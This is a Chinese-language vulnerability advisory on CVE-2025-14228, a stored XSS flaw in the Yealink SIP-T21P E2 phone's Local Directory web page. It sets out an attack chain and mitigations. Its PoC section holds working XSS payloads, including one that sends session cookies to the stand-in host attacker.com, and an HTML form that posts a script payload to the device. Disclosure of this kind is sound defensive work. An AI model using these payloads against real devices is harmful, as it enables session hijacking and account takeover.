CVE-2025-14228: Yealink SIP-T21P E2 跨站脚本(XSS)漏洞

漏洞信息

漏洞编号

CVE-2025-14228

漏洞类型

跨站脚本(XSS)

CVSS评分

3.5 低危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Yealink SIP-T21P E2

漏洞概述

CVE-2025-14228是影响Yealink SIP-T21P E2电话设备52.84.0.15版本的跨站脚本(XSS)漏洞。该漏洞存在于设备的本地目录(Local Directory)页面组件中，攻击者可以通过在目录条目中注入恶意JavaScript代码，当其他用户访问或查看该目录时，恶意脚本将在受害者浏览器上下文中执行。成功利用此漏洞的攻击者可以窃取用户会话Cookie、劫持用户账户、执行钓鱼攻击或植入进一步的攻击负载。由于该漏洞需要低权限认证且需要用户交互才能触发，CVSS评分为3.5，属于低危级别。值得注意的是，该受影响产品版本已不再受厂商维护支持，官方未对此漏洞做出响应或提供修复方案。

技术细节

该漏洞是存储型XSS(Stored XSS)漏洞，存在于Yealink SIP-T21P E2 IP电话的Web管理界面本地目录功能模块中。攻击者通过在添加或修改本地目录联系人信息时，在姓名、号码或公司字段中插入恶意JavaScript代码。当具备低权限的用户账户登录设备Web界面并浏览本地目录页面时，浏览器会解析并执行这些恶意脚本。由于攻击载荷存储在设备本地，一旦植入将持续存在，每次访问目录页面时都会触发。攻击者可利用此漏洞获取管理员会话凭证、修改设备配置或进行进一步的内网渗透攻击。漏洞的利用需要攻击者具备设备账户的低权限访问权限，并通过Web界面进行操作。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标设备型号为Yealink SIP-T21P E2，确认Web管理界面可访问

STEP 2

步骤2: 账户获取

攻击者通过暴力破解、默认凭证或社工手段获取设备的低权限用户账户

STEP 3

步骤3: 恶意代码注入

使用低权限账户登录Web管理界面，导航至本地目录页面，在联系人字段中注入恶意JavaScript代码

STEP 4

步骤4: 等待触发

攻击者等待其他用户(可能是管理员)访问本地目录页面，触发存储的XSS payload

STEP 5

步骤5: 会话劫持

恶意脚本在受害者浏览器中执行，窃取会话Cookie或执行其他恶意操作

STEP 6

步骤6: 权限提升

利用获取的管理员凭证访问设备管理后台，修改配置或部署进一步攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-14228 PoC - Stored XSS in Yealink SIP-T21P E2 Local Directory -->
<!-- Steps: 1. Login to Web Interface 2. Navigate to Local Directory 3. Add Contact with XSS Payload -->

<!-- XSS Payload for Local Directory Contact Name Field -->
<script>alert(document.cookie)</script>

<!-- More Advanced Payload - Session Hijacking -->
<img src=x onerror="fetch('http://attacker.com/steal?cookie='+document.cookie)">

<!-- PoC HTML Form for Automated Exploitation -->
<!DOCTYPE html>
<html>
<head><title>CVE-2025-14228 PoC</title></head>
<body>
<h2>CVE-2025-14228 - Yealink SIP-T21P E2 XSS PoC</h2>
<form action="http://TARGET_IP/servlet?m=mod_data&a=addContact" method="POST">
  <input type="hidden" name="name" value="<script>alert('XSS')</script>">
  <input type="hidden" name="phone" value="123456">
  <input type="hidden" name="company" value="Test Company">
  <input type="hidden" name="group" value="LocalDirectory">
  <input type="submit" value="Exploit">
</form>
</body>
</html>

影响范围

Yealink SIP-T21P E2 52.84.0.15

防御指南

临时缓解措施

由于Yealink官方未对该漏洞提供修复补丁且已停止对SIP-T21P E2产品的支持，建议采取以下临时缓解措施：1)通过网络隔离限制对设备Web界面的访问，仅允许管理终端访问；2)使用VPN或跳板机进行设备管理，避免直接暴露在公网；3)监控设备访问日志，及时发现异常操作行为；4)考虑更换仍在厂商支持周期内的新型号设备；5)如果业务允许，可暂时禁用本地目录功能以降低风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-14228
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-14228
3 Details https://www.cvedetails.com/cve/CVE-2025-14228/
4 VulDB https://vuldb.com/cve/CVE-2025-14228
5 Link https://drive.google.com/file/d/1vptRtEeoS1AZgnqow1yPrsgsBkw4jXc2/view?usp=sharing
6 Link https://vuldb.com/?ctiid.334670
7 Link https://vuldb.com/?id.334670
8 Link https://vuldb.com/?submit.701949